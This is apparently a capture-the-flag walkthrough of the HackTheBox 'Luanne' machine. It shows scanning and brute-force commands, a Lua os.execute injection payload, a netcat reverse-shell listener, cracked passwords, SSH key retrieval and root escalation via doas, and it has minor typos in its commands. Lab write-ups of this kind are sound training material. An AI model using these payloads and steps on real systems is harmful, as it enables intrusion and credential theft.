Today we are going to crack a machine called the Luanne. It was created by polarbearer. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
- Network Scanning
- Nmap Scan
- Enumeration
- Enumerating HTTP Service
- Directory Bruteforce using Gobuster
- Fuzzing Web API
- Exploitation
- Injecting the Lua RCE
- Getting the Shell
- Extracting webapi_user hash
- Enumerating using netstat
- Decrypting hash using John the Ripper
- Enumerating user r.michaels
- Getting SSH Private Key
- Connecting via SSH as r.michaels
- Reading User Flag
- Privilege Escalation
- Enumerating Backups
- Decoding Backups
- Extracting webapi_user hash
- Decrypting hash using John the Ripper
- Getting Root Shell
- Reading the Root Flag
Walkthrough
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox has a static IP Address.
IP Address assigned: 10.129.147.195
Network Scanning
Now that we have the IP Address. We need to enumerate open ports on the machine. For this, we will be running a Nmap scan.
nmap -A 10.129.147.195
There is quite some information that we can gain from the Nmap scan. It includes that three services are running on the target machine. It consists of an SSH service on port 21, followed by the HTTP service on port 80, and finally another HTTP service on port 9001.
Enumeration
Since we are lacking any credentials that can be used to log in via SSH service, we start with the HTTP service on port 80. There isn’t much to go on since we are blocked by an authentication panel. We tried a bunch of common usernames and passwords but were unable to get across it.
http://10.129.147.195
Another thing that we can do at this stage is performing a directory Bruteforce. We are going to use gobuster for this particular task. We used a bunch of different dictionaries and finally were able to get robots.txt as shown in the image below.
gobuster dir --url http://10.129.147.195/ --wordlist /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
To take a look at the contents of robots.txt, we used the web browser. We see that there is a directory by the name of weather in the Disallow section. There is a note that tells us that it is returning a Not Found error but is still able to “harvest” cities. It doesn’t make any sense at this moment.
http://10.129.147.195/robots.txt
Since we have the gobuster at our disposal, we thought why not let it run on the weather directory. It gave us another directory by the name of the forecast. Maybe it is a weather forecasting application. We will see along the way.
gobuster dir --url http://10.129.147.195/weather/ --wordlist /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
Upon opening the forecast page on our web browser, we see that it is a JSON response. It is an error message about the fact that we are missing the city. It tells us to use the city variable with the value list to get the list of all the available cities.
10.129.147.195/weather/forecast
We added the city parameter into the URL with the value list and we have it. It is a small list consisting of various cities in the UK.
10.129.147.195/weather/forecast?city=list
After messing around with the parameter and values we added a quote mark at the end of London to see what kind of response that we get. It gave a Lua error. The good news was that it gave us a directory path along with the error message.
10.129.147.195/weather/forecast?city=London'
Since we broke the query with a quote, we tried to fix it and insert some parameters in the hope to get an injection attack out of it. After trying a bunch of different options, we were able to get some success with Remote Command Execution with the os.execute. We have demonstrated this by reading the /etc/passed file using the cat command.
10.129.147.195/weather/forecast?city=London’)os.execute("cat /etc/passwd")--
Now to get a shell out of the remote command execution we have, we thought it is best if encode the reverse shellcode in URL encoding. We achieved this using the website we found urlencoder.org. Ensure to enter the IP Address of the VPN with a port on your attacker’s machine.
Now, we entered the port number that we want to receive the shell as 1234. So before executing the command, we ran a Netcat listener on the port to receive the reverse shell. Followed by that we entered the URL encoded reverse shell command as shown in the image.
10.129.147.195/weather/forecast?city=London’)os.execute(“URL Encoded Reverse Shell Code”)--
As soon as the command was executed, we were able to get a shell on the target machine. We used the ls command to find some clues and we were able to get the .htpasswd file. Upon reading the file we get that there is a user by the name of webapi_user and we found its hashed password. Another task we did after getting the shell was to check for network connections. We found that there is an internal service running on port 3001.
nc -lvp 1234 ls -la cat .htpasswd netstat -ant
We take the hash that we found and entered it into a file by the name of luannehash. We used the John the Ripper on the hash to crack it. We found that it was encrypted into MD5. The hash cracked to be iamthebest. Now we have the password for the user webapi_user.
john -wordlist=/usr/share/wordlists/rockyou.txt luannehash iamthebest
We used the credentials that we find and tried to connect to the target machine via SSH. We were not allowed to log in. So, we went back to our shell and tried to enumerate further. We found another user by the name of r.michaeals. Upon entering the user’s directory, we found an SSH Private key that we can use to log in. We used the curl command to read the contents of the id_rsa file.
curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa
After copying and pasting the key on our Kali machine and providing the appropriate permissions we were able to log in on the target machine as an r.michaels user through SSH. We were greeted by the NetBSD message. We again listed the files in the current directory where we were able to get the user flag. We also found the backups directory. After traversing into the backups directory, we found a backup file by the name of devel_backup-2020-09-16.tar.gz.enc.
ssh -I key [email protected] ls -la cat user.txt cd backups ls -la
As it seemed to be encoded, we used the netpgp command to decrypt the backup file into the raj.tar.gz file. Next, we tried to decompress the raj file that we just encoded into the tmp directory. Upon close inspection, we see that it is quite similar to the www directory that we visited earlier. It had a .htpasswd file as well. Upon reading the file we found that the hash seemed to be a bit different than the first time.
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/raj.tar.gz cd /tmp tar -xf raj.tar.gz cd devel-2020-09-16/ ls cd www ls -la cat .htpasswd
We took the hash back to the Kali Linux and used the John the Ripper to decode it as before. This time we used the name hash. The password came out to be a little bear as shown in the image below.
john --wordlist=/usr/share/wordlists/rockyou.txt hash littlebear
We used the doas command to login as su using the password that we just cracked. We were allowed to get elevated access. We went into the root directory to find the final flag and conclude the machine.
doas su littlebear cd /root cat root.txt
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn